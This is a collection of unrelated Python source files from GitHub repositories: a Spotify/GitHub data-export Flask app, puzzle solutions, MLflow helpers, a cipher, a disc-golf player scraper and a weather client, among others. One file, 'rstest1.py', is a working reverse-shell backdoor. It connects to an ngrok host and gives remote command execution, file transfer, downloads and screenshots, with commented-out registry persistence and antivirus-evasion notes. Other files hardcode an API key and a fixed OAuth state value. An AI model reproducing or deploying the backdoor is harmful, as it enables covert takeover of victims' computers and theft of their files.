artists = requests.get("https://api.spotify.com/v1/me/following?type=artist", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
artists = artists.json()['artists']['items']
albums = []
album_req = requests.get("https://api.spotify.com/v1/me/albums", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in album_req.json()['items']:
albums.append(item)
while "next" in album_req.json() and album_req.json()['next'] != None:
album_req = requests.get(album_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in album_req.json()['items']:
albums.append(item)
playlists = []
playlist_req = requests.get("https://api.spotify.com/v1/me/playlists", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in playlist_req.json()['items']:
playlists.append(item)
while "next" in playlist_req.json() and playlist_req.json()['next'] != None:
playlist_req = requests.get(playlist_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in playlist_req.json()['items']:
playlists.append(item)
liked_songs = []
track_req = requests.get("https://api.spotify.com/v1/me/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
liked_songs.append(item)
while "next" in track_req.json() and track_req.json()['next'] != None:
track_req = requests.get(track_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
liked_songs.append(item)
liked_episodes = []
episode_req = requests.get("https://api.spotify.com/v1/me/episodes", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in episode_req.json()['items']:
liked_episodes.append(item)
while "next" in episode_req.json() and episode_req.json()['next'] != None:
episode_req = requests.get(episode_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in episode_req.json()['items']:
liked_episodes.append(item)
shows = []
show_req = requests.get("https://api.spotify.com/v1/me/shows", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in show_req.json()['items']:
shows.append(item)
while "next" in show_req.json() and show_req.json()['next'] != None:
show_req = requests.get(show_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in show_req.json()['items']:
shows.append(item)
top_tracks = []
track_req = requests.get("https://api.spotify.com/v1/me/top/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
top_tracks.append(item)
while "next" in track_req.json() and track_req.json()['next'] != None:
track_req = requests.get(track_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
top_tracks.append(item)
top_artists = []
artist_req = requests.get("https://api.spotify.com/v1/me/top/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in artist_req.json()['items']:
top_artists.append(item)
while "next" in artist_req.json() and artist_req.json()['next'] != None:
artist_req = requests.get(artist_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in artist_req.json()['items']:
top_artists.append(item)
current_playback = requests.get("https://api.spotify.com/v1/me/player", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if current_playback.text == '':
current_playback = {"error": "Nothing was playing while backing up."}
else:
current_playback = current_playback.json()
devices = requests.get("https://api.spotify.com/v1/me/player/devices", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if devices.text == '':
devices = {"error": "No devices available."}
else:
devices = devices.json()
recently_played = []
req = requests.get("https://api.spotify.com/v1/me/player/recently-played", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in req.json()['items']:
recently_played.append(item)
while "next" in req.json() and req.json()['next'] != None:
req = requests.get(req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in req.json()['items']:
recently_played.append(item)
profile = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
username = profile.json()['display_name']
os.mkdir(f"DataPak{username}/")
f = open(f"DataPak{username}/library.json", "w")
print({"artists": artists, "albums": albums, "playlists": playlists, "liked_songs": liked_songs, "liked_episodes": liked_episodes, "shows": shows, "top_tracks": top_tracks, "top_artists": top_artists}, file=f)
f.close()
f = open(f"DataPak{username}/playback.json", "w")
print({"current_playback": current_playback, "devices": devices, "recently_played": recently_played}, file=f)
f.close()
f = open(f"DataPak{username}/profile.json", "w")
print(profile.json(), file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/spotify/callback')
def spotcallback():
code = request.args.get("code")
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "authorization_code",
"type": "authorization_code",
"code": code,
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': client_id,
"client_secret": client_secret
})
session['spotify_token'] = r.json()['access_token']
session['spotify_refresh_token'] = r.json()['refresh_token']
return redirect('/')
@app.route('/github/info')
def ghinfo():
return render_template("ghinfo.html")
@app.route('/github')
def github():
if not "gh_token" in session:
state = "irajfvnqehrtdfwbejktrbnvfbiwkjetrnfgcwkjenrsflwejkbtnfjbrethvbw3urskejg"
session['state'] = state
return redirect(f"https://github.com/login/oauth/authorize?state={state}&client_id={os.environ['GITHUB_CLIENT_ID']}&scope=repo read:repo_hook read:org read:public_key gist user read:discussion read:packages read:gpg_key&redirect_uri=https://DataPak.coolcodersj.repl.co/github/callback")
else:
r = requests.get("https://api.github.com/user", headers={
"Authorization": f"token {session['gh_token']}"
})
account = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/followers", headers={
"Authorization": f"token {session['gh_token']}"
})
followers = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/following", headers={
"Authorization": f"token {session['gh_token']}"
})
following = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/gists", headers={
"Authorization": f"token {session['gh_token']}"
})
gists = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/starred", headers={
"Authorization": f"token {session['gh_token']}"
})
starred = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/subscriptions", headers={
"Authorization": f"token {session['gh_token']}"
})
watchlist = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/orgs", headers={
"Authorization": f"token {session['gh_token']}"
})
organizations = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/repo", headers={
"Authorization": f"token {session['gh_token']}"
})
repos = r.json()
os.mkdir(f"DataPak{account['login']}/")
print(account, file=open(f"DataPak{account['login']}/account.json", "w"))
print(followers, file=open(f"DataPak{account['login']}/followers.json", "w"))
print(following, file=open(f"DataPak{account['login']}/following.json", "w"))
print(gists, file=open(f"DataPak{account['login']}/gists.json", "w"))
print(starred, file=open(f"DataPak{account['login']}/starred.json", "w"))
print(watchlist, file=open(f"DataPak{account['login']}/watchlist.json", "w"))
print(organizations, file=open(f"DataPak{account['login']}/orgs.json", "w"))
print(repos, file=open(f"DataPak{account['login']}/repos.json", "w"))
username = account['login']
for repo in repos:
name = repo['name']
branch = repo['default_branch']
r = requests.get(f'https://github.com/{username}/{name}/archive/refs/heads/{branch}.zip')
f = open(f'DataPak{username}/{name}.zip', "w+")
print(r.content, file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/github/callback')
def authorized():
code = request.args.get("code")
r = requests.post("https://github.com/login/oauth/access_token", data={
"client_id": os.environ['GITHUB_CLIENT_ID'],
"client_secret": os.environ['GITHUB_CLIENT_SECRET'],
"code": code,
"state": session['state']
},
headers={
"Accept": "application/json"
})
session['gh_token'] = r.json()['access_token']
return redirect("/")
app.run(host="0.0.0.0", port=8080) | CoolCoderSJ/DataPak | main.py | main.py | py | 17,220 | python | en | code | 3 | github-code | 36 |
11904574293 | def printGrid(grid):
for row in grid:
print("".join([str(i) for i in row]))
def copyGrid(grid):
return [row.copy() for row in grid]
def isInRange(grid, r, c):
return r >= 0 and r < len(grid) and c >= 0 and c < len(grid[0])
def flash(grid, alreadyFlashed, r, c):
if grid[r][c] <= 9 or (r, c) in alreadyFlashed:
return
# print("Flash: " + str((r,c)))
alreadyFlashed.add((r, c))
for i in range(r-1, r+2):
for j in range(c-1, c+2):
if isInRange(grid, i, j):
grid[i][j] += 1
flash(grid, alreadyFlashed, i, j)
def isSynced(grid):
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] != 0:
return False
return True
def simulate(grid, numSteps):
flashCount = 0
flashed = set()
sync = False
step = 0
while not sync:
step += 1
# increase every energy level
for i in range(len(grid)):
for j in range(len(grid[0])):
grid[i][j] += 1
# flash
for i in range(len(grid)):
for j in range(len(grid[0])):
flash(grid, flashed, i, j)
# any octupus that flashed should be set to 0
for r, c in flashed:
grid[r][c] = 0
flashCount += len(flashed)
flashed = set()
sync = isSynced(grid)
return step
def solve(file):
grid = [[int(s) for s in list(l.strip())] for l in open(file).readlines()]
step = simulate(grid, 100)
print(step)
solve("inputs/11/full.txt") | ianlayzer/adventofcode2021 | code/11.py | 11.py | py | 1,607 | python | en | code | 0 | github-code | 36 |
12676975577 | import mlflow
import dvc.api
import pandas as pd
def yield_artifacts(run_id, path=None):
"""Yield all artifacts in the specified run"""
client = mlflow.tracking.MlflowClient()
for item in client.list_artifacts(run_id, path):
if item.is_dir:
yield from yield_artifacts(run_id, item.path)
else:
yield item.path
def fetch_logged_data(run_id):
"""Fetch params, metrics, tags, and artifacts in the specified run"""
client = mlflow.tracking.MlflowClient()
data = client.get_run(run_id).data
# Exclude system tags: https://www.mlflow.org/docs/latest/tracking.html#system-tags
tags = {k: v for k, v in data.tags.items() if not k.startswith("mlflow.")}
artifacts = list(yield_artifacts(run_id))
return {
"params": data.params,
"metrics": data.metrics,
"tags": tags,
"artifacts": artifacts,
}
def dvc_open(path, url, branch):
with dvc.api.open(
path = path, ## 데이터 경로
repo = url, ## github repo 경로,
rev = branch ## 현재는 branch 기준
) as f:
return pd.read_csv(f, sep=",")
def find_experiment_id(experiment_name):
current_experiment = dict(mlflow.get_experiment_by_name(experiment_name))
return current_experiment["experiment_id"]
| robert-min/bike_share_mlflow | model/utils.py | utils.py | py | 1,317 | python | en | code | 0 | github-code | 36 |
17579968573 | import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from numpy import *
import sys
file_name = sys.argv[1]
data1 = loadtxt("./" + file_name)
NUM=data1[:,0] #
TIME=data1[:,1] #
fig = plt.figure() #
top = fig.add_subplot(111) # 1 riga, 1 colonna, figura 1
top.set_title('BRUTE FORCE')
top.grid()
top.set_xlabel('n')
top.set_ylabel('time')
top.plot(NUM, TIME)
#top.text(200,35,"Steps: "+str(int(STEPS)))
plt.savefig('fatt-brute-force.pdf')
#plt.show()
| UnProgrammatore/CCQ | altre_cose/fattorizzazione_mpi_banale_print/plot.py | plot.py | py | 480 | python | en | code | 0 | github-code | 36 |
27511187637 | a=["Arun","Sri","Kavi"]
b=["male","female","female"]
c=["married","married","single"]
for i in range(0,len(a)):
if(b[i]=="male"):
print("mr:",a[i])
elif(c[i]=="single"):
print("Ms:",a[i])
else:
print("Mrs:",a[i])
| kavi234/GUVI | Zen Class/day 8/listif.py | listif.py | py | 259 | python | en | code | 0 | github-code | 36 |
11029799743 |
def fun(*args):
res = sum(args)
return res
def my_range(*args):
if len(args) == 1:
start = 0
stop = args[0]
step = 1
elif len(args) == 2:
start = args[0]
stop = args[1]
step = 1
elif len(args) == 3:
start = args[0]
stop = args[1]
step = args[2]
args = (1, 2, 4, 7)
val = fun(1, 2, 2, 1, 100, 20)
print(val) | pymft/mft-vanak-archive-october-2018 | S05/functions/test.py | test.py | py | 404 | python | en | code | 0 | github-code | 36 |
34189683080 | #!/usr/bin/env python
# coding: utf-8
# # Pandas Lab Exercise
#
#
# ## Part - 1
# We shall now test your skills in using Pandas package. We will be using the [games Dataset](https://www.kaggle.com/gutsyrobot/games-data/data) from Kaggle.
#
# Answer each question asked below wrt the games dataset.
# ** Import pandas as pd.**
# In[1]:
import pandas as pd
# ** Read games.csv as a dataframe called games.**
# In[2]:
games = pd.read_csv("games.csv")
# ** Check the head of the DataFrame. **
# In[3]:
games.head()
# ** Use .info() method to find out total number of entries in dataset**
# In[4]:
games.info()
# **What is the mean playin time for all games put together ?**
# In[6]:
games['playingtime'].mean()
# ** What is the highest number of comments received for a game? **
# In[7]:
games['total_comments'].max()
# ** What is the name of the game with id 1500? **
# In[8]:
games[games['id']==1500]['name']
# ** And which year was it published? **
# In[9]:
games[games['id']==1500]['yearpublished']
# ** Which game has received highest number of comments? **
# In[10]:
games[games['total_comments']==games['total_comments'].max()]
# ** Which games have received least number of comments? **
# In[11]:
games[games['total_comments']==games['total_comments'].min()]
# ** What was the average minage of all games per game "type"? (boardgame & boardgameexpansion)**
# In[13]:
games.groupby('type').mean()['minage']
# ** How many unique games are there in the dataset? **
# In[14]:
games['id'].nunique()
# ** How many boardgames and boardgameexpansions are there in the dataset? **
# In[15]:
games['type'].value_counts()
# ** Is there a correlation between playing time and total comments for the games? - Use the .corr() function **
# In[18]:
games[['playingtime','total_comments']].corr()
# In[ ]:
| Pragati-Gawande/100-days-of-code | Day_13/Kaggle Games Dataset.py | Kaggle Games Dataset.py | py | 1,876 | python | en | code | 5 | github-code | 36 |
26823163714 | from math import trunc
a = 159 # Key 1
b = 580 # Key 2
n = 26 # Alphabet size
plaintext = 'no' # Plaintext
def encrypt(a,b,n,plaintext):
alphabet = None
ciphertext = ''
p = 0
if(n == 26):
alphabet = 'abcdefghijklmnopqrstuvwxyz'
elif(n == 45):
alphabet = 'abdefghijklmnopqrstuvwxyz!£$%^&*()0123456789'
elif(n == 122):
alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
alphabet = list(alphabet)
plaintext = list(plaintext)
x = alphabet.index(plaintext[0])
y = alphabet.index(plaintext[1])
p = x*n + y
n2 = n*n
p = (a*p+b) % n2
x = trunc(p / n)
y = trunc(p % n)
ciphertext = ciphertext + alphabet[x]
ciphertext = ciphertext + alphabet[y]
print(ciphertext)
encrypt(a,b,n,plaintext) | PadraigHalstead/Cryptography | Ciphers/Classical */Affine Cipher */Strengthened Affine */Encrypt.py | Encrypt.py | py | 858 | python | en | code | 0 | github-code | 36 |
31982185532 | import requests
from bs4 import BeautifulSoup
from datetime import datetime
import os.path
import csv
import threading
from queue import Queue
# Proxies for BURP - update requests if you want to use this proxy
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
playersFile = 'sample_corrected.txt'
ids = Queue()
# Please be nice to the PDGA site :)
THREADS = 1
class Player:
def __init__(self, pdga):
self.store = []
self.failure = False
self.pdga = pdga
r = requests.get(f'https://www.pdga.com/player/{pdga}')
soup = BeautifulSoup(r.text, 'html.parser')
pi = soup.find('ul', class_='player-info info-list')
self.today = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
# if access denied|page not found go to next player
self.check_failures(soup)
if self.failure:
return
player = soup.h1.get_text()
# Fields that will always exist for all members
self.name = player.split(' #')[0].replace(',', ' ')
self.status = pi.find('li', class_='membership-status').text.split('Status: ')[1].split(' ')[0]
# The remaining fields may not be on the profile so I had to check to see if they exist before parsing
expiration = pi.find('li', class_='membership-status').text.split('Status: ')[1]
if 'until' in expiration:
self.expiration = expiration.split('until ')[1].replace(')', '')
else:
self.expiration = expiration.split('as of ')[1].replace(')', '')
self.joindate = pi.find('li', class_='join-date')
if self.joindate:
self.joindate = self.joindate.text.split('Member Since: ')[1].split(' ')[0]
else:
self.joindate = ''
try:
location = pi.find('li', class_='location').text.split('Classification:')[0].split('Location: ')[1].split(
',')
except:
location = ''
if location:
# City, State, Country
if len(location) >= 3:
self.city = location[0].lstrip()
self.state = location[1].lstrip()
self.country = location[2].split('Member Since: ')[0].lstrip()
# Only State/Prov, Country
if len(location) == 2:
self.city = 'N/A'
self.state = location[0].lstrip()
self.country = location[1].split('Member Since: ')[0].lstrip()
# Country Only
if len(location) == 1:
self.city = 'N/A'
self.state = 'N/A'
self.country = location[0].split('Member Since: ')[0].lstrip()
self.loclink = pi.find('li', class_='location').find('a')['href']
else:
self.city = ''
self.state = ''
self.country = ''
self.loclink = ''
self.rating = pi.find('li', class_='current-rating')
if self.rating:
self.rating = self.rating.text.split('Current Rating: ')[1].split(' ')[0]
else:
self.rating = ''
self.classification = pi.find('li', class_='classification')
if self.classification:
self.classification = self.classification.text.split('Classification: ')[1]
else:
self.classification = ''
self.events = pi.find('li', class_='career-events')
if self.events:
self.events = self.events.text.split('Career Events: ')[1].replace(',', '')
else:
self.events = ''
self.earnings = pi.find('li', class_='career-earnings')
if self.earnings:
self.earnings = self.earnings.text.split('Career Earnings: ')[1].replace(',', '').strip('$')
else:
self.earnings = '0'
self.wins = pi.find('li', class_='career-wins disclaimer')
if self.wins:
self.wins = self.wins.text.split('Career Wins: ')[1]
else:
self.wins = '0'
self.store_vals()
self.write_data()
# Set values to store in file
def store_vals(self):
self.store = [self.pdga, self.name, self.city, self.state, self.country, self.loclink, self.classification,
self.joindate, self.status, self.expiration, self.rating, self.events, self.wins, self.earnings,
self.today]
print(self.store)
# Append player to file
def write_data(self):
with open(playersFile, 'a+', newline='', encoding='utf-8') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writer.writerow(self.store)
# Display detailed data on each a player
def verbose(self):
print(f'Scrape Date: {self.today}')
print(f"ID: {self.pdga}")
print(f"Name: {self.name}")
print(f"Status: {self.status}")
print(f"Expiration: {self.expiration}")
print(f"City: {self.city}")
print(f"State: {self.state}")
print(f"Location Link: {self.loclink}")
print(f"Country: {self.country}")
print(f"Rating: {self.rating}")
print(f"Classification: {self.classification}")
print(f"Events: {self.events}")
print(f"Wins: {self.wins}")
print(f"Earnings: {self.earnings}")
# Check if player page exists before trying to scrape profile
def check_failures(self, soup):
fail = ['Page not found', 'Access denied']
if any(x in soup.h1.get_text() for x in fail):
print(f'Not a valid player: {self.pdga}')
self.name = ''
self.status = ''
self.start = ''
self.expiration = ''
self.city = ''
self.state = ''
self.country = ''
self.loclink = ''
self.rating = ''
self.classification = ''
self.earnings = ''
self.events = ''
self.wins = ''
self.joindate = ''
self.store_vals()
self.failure = True
# Create player file if it doesn't exist. If it does exist return the next user to scrape.
def check_file():
header = ['id', 'name', 'city', 'state', 'country', 'loclink', 'classification', 'joindate', 'status', 'expiration',
'rating', 'events', 'wins', 'earnings', 'scrape date']
if os.path.exists(playersFile):
print(f'Appending to already created file - {playersFile}')
return get_recent_scrape()
else:
print(f'File created - {playersFile}')
with open(playersFile, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writer.writerow(header)
return 0
# Get total number of PDGA players to set limit of scraping
def find_last_player():
print('\nFinding number of registered PDGA members...')
pl = requests.get(
'https://www.pdga.com/players?FirstName=&LastName=&PDGANum=&Status=All&Gender=All&Class=All&MemberType=All'
'&City=&StateProv=All&Country=All&Country_1=All&UpdateDate=&order=PDGANum&sort=desc')
psoup = BeautifulSoup(pl.text, 'html.parser')
last_player = psoup.find('table', class_='views-table cols-8').find('td', class_='views-field views-field-PDGANum '
'active pdga-number').get_text(
).rstrip()
print(f'There are {int(last_player)} registered PDGA members!!!')
return int(last_player)
# Get the last PDGA member scraped and saved
def get_recent_scrape():
# Since threading can cause the last saved player to be out of order check the last THREADS number of lines
# and find the max PDGA number of the last saved
with open(playersFile, "r", encoding="utf-8", errors="ignore") as scraped:
# final_line = (scraped.readlines()[-1].split(',')[0])
print(f'Cecking last {THREADS} lines to find last saved player')
last_lines = []
scrape = scraped.readlines()
for line in range(1, int(THREADS) + 1):
# print(f"Line: {line} - {scrape[-line].split(',')[0]}")
last_lines.append(scrape[-line].split(',')[0])
nextScrape = int(max(last_lines)) + 1
print(f'Last lines: {last_lines}')
print(f"\nThe last player scrapted was PDGA #{max(last_lines)}")
print(f"Continuing scraping on PDGA #{nextScrape}...")
return nextScrape
# Return [next player to scrape, most recent registered member]
def get_range():
return range(check_file(), find_last_player())
# Scrape function for threading
def scrape_player():
global ids
while True:
pdga = ids.get()
Player(pdga)
ids.task_done()
# Fill queue with remaining players
def fill_queue():
id_range = get_range()
for id in id_range:
ids.put(id)
print(f'\nAdding PDGA members from {id_range[0]} to {id_range[1]}')
print(f'Queue of IDs full with {ids.qsize()} members to go!')
if __name__ == '__main__':
fill_queue()
print('Starting scraping of members...')
for i in range(THREADS):
print(f'Starting thread #{i}')
t = threading.Thread(target=scrape_player)
t.start()
| zcrosman/PDGAscrape | PDGAscrape.py | PDGAscrape.py | py | 9,296 | python | en | code | 0 | github-code | 36 |
17891621206 | __author__ = 'rogermao'
class person:
def __init__(self,name):
self.name = name
self.gender = ""
self.conflictDates = []
self.experience = -1
self.largeGroup = True
self.nineThirty = True
self.twelveThirty = True
self.largeGroupCount = 0
self.nineThirtyCount = 0
self.twelveThirtyCount = 0
self.car = False
self.dates = []
def addLargeGroup(self):
self.largeGroupCount += 1
def addNineThirty(self):
self.nineThirtyCount += 1
def addTwelveThirty(self):
self.twelveThirtyCount += 1
| toheebster/welcoMe | Person.py | Person.py | py | 621 | python | en | code | 0 | github-code | 36 |
73712141864 | from typing import Dict, Any
from argus.processors.post_processors.utils import post_process as pp
from h2o_docai_scorer.post_processors.post_processor_supply_chain import PostProcessor as PostProcessorSupplyChain
class PostProcessor(PostProcessorSupplyChain):
"""Represents a last step in pipeline process that receives all pipeline intermediate
results and translates them into a final json structure that will be returned to user.
"""
def get_pages(self) -> Dict[int, Any]:
return super().get_pages()
def get_entities(self):
if not self.has_labelling_model:
return []
docs = pp.post_process_predictions(
model_preds=self.label_via_predictions,
top_n_preds=self.label_top_n,
token_merge_type="MIXED_MERGE",
token_merge_xdist_regular=1.0,
label_merge_x_regular="ALL",
token_merge_xydist_regular=1.0,
label_merge_xy_regular="address",
token_merge_xdist_wide=1.5,
label_merge_x_wide="phone|fax",
output_labels="INCLUDE_O",
verbose=True,
)
df_list = []
for doc in docs:
predictions = docs[doc]
predictions = predictions.round(decimals=4)
for idx, row in predictions.iterrows():
df_list.append(row.to_dict())
return df_list
'''
Converting the dictionary to a dataframe
import pandas as pd
import json
f = open('result.json')
dict_data = json.load(f)
df = pd.DataFrame(dict_data['entities'])
df.to_csv('result.csv')
'''
| h2oai/docai-recipes | post_processor/v0.6/post_processor_4.py | post_processor_4.py | py | 1,636 | python | en | code | 4 | github-code | 36 |
28436305539 | import socket
import subprocess
import json
import os
import base64
import sys
import shutil
import time
import requests
from termcolor import colored
from mss import mss
def reliable_send(data):
json_data=json.dumps(data)
sock.send(json_data.encode('utf-8'))
def reliable_recv():
data=''
while True:
try:
data=data+sock.recv(1024).decode('utf-8')
return json.loads(data)
except ValueError:
continue
def download(url):
get_res=requests.get(url)
file_name=url.split("/")[-1]
with open(file_name,"wb") as file:
file.write(get_res.content)
def screenshot():
with mss() as screenshot:
screenshot.shot()
def is_admin():
global admin
try:
temp=os.listdir(os.sep.join([os.environ.get('SystemRoot','C:\windows'),'temp']))
except:
admin="[!!] user privileges"
else:
admin="[+] administrator priviliges"
def connection():
while True:
time.sleep(7)
try:
sock.connect(('0.tcp.ngrok.io',11174))
shell()
except:
connection()
def shell():
while True:
command=reliable_recv()
cmd=str(command)
if cmd=="":
break
print("Command from the server: "+cmd)
if cmd.lower()=="q":
print("socket closed")
break
elif command=="help":
help_options=''' download path --> download a file from target pc
upload path --> uplaod a file to target pc
get url --> downding from internet
check --> checking privileges
screenshot --> screenshot target pc
help --> help options
start path --> starting a program
q --> stop the shell
'''
reliable_send(help_options)
elif cmd[:2] =="cd" and len(cmd)>2:
try:
os.chdir(cmd[3:])
except:
continue
elif command[:8]=="download":
with open(command[9:],"rb") as file:
file_data=base64.b64encode(file.read())
reliable_send(file_data.decode())
elif command[:6]=="upload":
with open(command[7:],"wb") as fle:
fle_data=reliable_recv()
fle.write(base64.b64decode(fle_data))
elif command[:3] =="get":
try:
download(command[4:])
reliable_send(colored('[+] Downloaded file with the given url','green'))
except:
reliable_send(colored('[+] File Downloaded failed','red'))
elif command[:5]=="start" and len(command[6:])>13:
lst=command[6:].split(".")
try:
subprocess.Popen(lst[-1][:len(lst[-1])-1],shell=True)
reliable_send("[+] started")
except:
reliable_send("[-] Failed to start")
elif command[:5] =="start":
try:
subprocess.Popen(command[6:],shell=True)
reliable_send("[+] started")
except:
reliable_send("[-] Failed to start")
elif command[:10]=="screenshot":
try:
screenshot()
with open('monitor-1.png','rb') as img:
img_data=base64.b64encode(img.read())
img_data=img_data.decode('utf-8')
reliable_send(img_data)
os.remove('monitor-1.png')
except:
failed="[!!] failed to take screenshot"
reliable_send(failed)
elif command[:5]=="check":
try:
is_admin()
reliable_send(admin)
except:
reliable_send("[-] Cannot perform the task")
else:
proc=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
result=proc.stdout.read() +proc.stderr.read()
reliable_send(result.decode('utf-8'))
# location=os.environ["appdata"]+"\\winhar32.exe"
# if not os.path.exists(location):
# shutil.copy(sys.executable,location)
# subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "' + location +'"', shell=True)
# file_name=sys._MEIPASS+"\image.jpg"
# try:
# subprocess.Popen(file_name,shell=True)
# except:
# # to bypass antivirus
# num=1
# num2=3
# num3=num+num2
# file_name=sys._MEIPASS+"\image.jpg"
try:
subprocess.Popen(file_name,shell=True)
except:
# tp bypass antivirus
num=1
num2=3
num3=num+num2
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection()
sock.close()
# check the ip address
| sharshith1312/reverse_shell | rstest1.py | rstest1.py | py | 5,215 | python | en | code | 0 | github-code | 36 |
43314571963 | import requests
def getweather(city):
api = "96e3cd3e19571466a39662b984eec5f1"
server = "https://api.openweathermap.org/data/2.5/weather"
request = f"{server}?q={city}&appid={api}"
output = requests.get(request)
if output.status_code == 200:
weather_data = output.json()
weather = weather_data["weather"][0]["main"]
description = weather_data["weather"][0]["description"]
temperature = str(round(weather_data["main"]["temp"] - 273.15, 1)) + " °C"
pressure = str(round(weather_data["main"]["pressure"] * 100 * 0.00750063755419211, 1)) + " mmHg"
output_weather = \
f"""Weather: {weather}, {description},
t°: {temperature},
Pressure: {pressure}"""
return f"{output_weather}"
else:
return "City not found"
| XBOPb/Projects | API_Weather_App/weatherAPI.py | weatherAPI.py | py | 821 | python | en | code | 0 | github-code | 36 |
40286818253 | # типы данных и переменная
# int, float, boolean, str, list, None
# value = None
# print(type(value))
# a = 123
# b = 1.23
# print(a)
# print(b)
value = 12334
# print(type(value))
# s = 'hello nworld'
# print(s) # вывод строки
# print(a, ' - ', b, ' - ', s)
# print('{1} - {2} - {0}'.format(a, b, s)) # формат
# print(f'{a} - {b} - {s}') # интерполяция
# f = False
# print(f)
# list = ['1', '2', '3']
# print(list)
# Ввод-вывод данных
# print('Введите a')
# a = int(input())
# print('Введите b')
# b = int(input())
# print(a, ' + ', b, ' = ', a + b)
# АРИФМЕТИЧЕСКИЕ ОПЕРАЦИИ
# a = 1.31231223
# b = 3
# c = round(a * b, 7)
# print(c)
# a = 3
# a += 5
# print(a)
# ЛОГИЧЕСКИЕ ОПЕРАЦИИ
# a = [1, 2]
# b = [1, 2]
# print(a == b)
# a = 1 < 3 < 5 > 7
# print(a)
# func = 1
# T = 4
# x = 2
# print(func < T > x)
# f = [1, 2, 3, 4]
# print(f)
# print(not 2 in f)
# is_odd = f[0] % 2 == 0
# print(is_odd)
# if, if-else
# a = int(input('a = '))
# b = int(input('b = '))
# if a > b:
# print(a)
# else:
# print(b)
# while, do while
# original = 23
# inverted = 0
# while original != 0:
# inverted = inverted * 10 + (original % 10)
# original //= 10 # целочисленное деление на 10
# else:
# print('Пожалуй')
# print('хватит )')
# print(inverted)
# for
# for i in range(1, 10, 2):
# print(i)
# СТРОКИ
# text = 'съешь ещё этих мягких французских булок'
# print(text[0])
# print(len(text))
# help(int) # помощь
# ФУНКЦИИ
def f(x):
if x == 1:
return 'Целое'
elif x == 2.3:
return 23
else:
return
arg = 2.3
print(f(arg))
print(type(f(arg)))
| stannavi/python_intro_sborisovsky | lections/lec1.py | lec1.py | py | 1,822 | python | ru | code | 0 | github-code | 36 |
19530926102 | """
Projeto Marinha do Brasil
Autor: Pedro Henrique Braga Lisboa (pedro.lisboa@lps.ufrj.br)
Laboratorio de Processamento de Sinais - UFRJ
Laboratorio de de Tecnologia Sonar - UFRJ/Marinha do Brasil
"""
from __future__ import print_function, division
import os
import h5py
import warnings
import numpy as np
import scipy.io.wavfile as wav
import soundfile as sf
def load_raw_data(input_db_path, verbose=0):
"""
Loads sonar audio datafiles on memory.
This function returns a nested hashmap associating each run audio data with its
class and filename. The audio information is composed by
the frames stored in a numpy array and the file informed sample rate.
E.g. for database '4classes' the returned dictionary will be set like:
ClassA:
navio10.wav:
signal: np.array
sample_rate: np.float64
navio11.wav:
signal: np.array
sample_rate: np.float64
ClassB:
navio20.wav:
...
navio21.wav:
...
...
...
params:
input_data_path (string):
path to database folder
return (SonarDict):
nested dicionary in which the basic unit contains
a record of the audio (signal key) in np.array format
and the sample_rate (fs key) stored in floating point.
The returned object also contains a method for applying
functions over the runs (see SonarDict.apply).
the map is made associating each tuple to the corresponding
name of the run (e.g. )
"""
if verbose:
print('Reading Raw data in path %s' % input_db_path)
class_folders = [folder for folder in os.listdir(input_db_path)
if not folder.startswith('.')]
raw_data = dict()
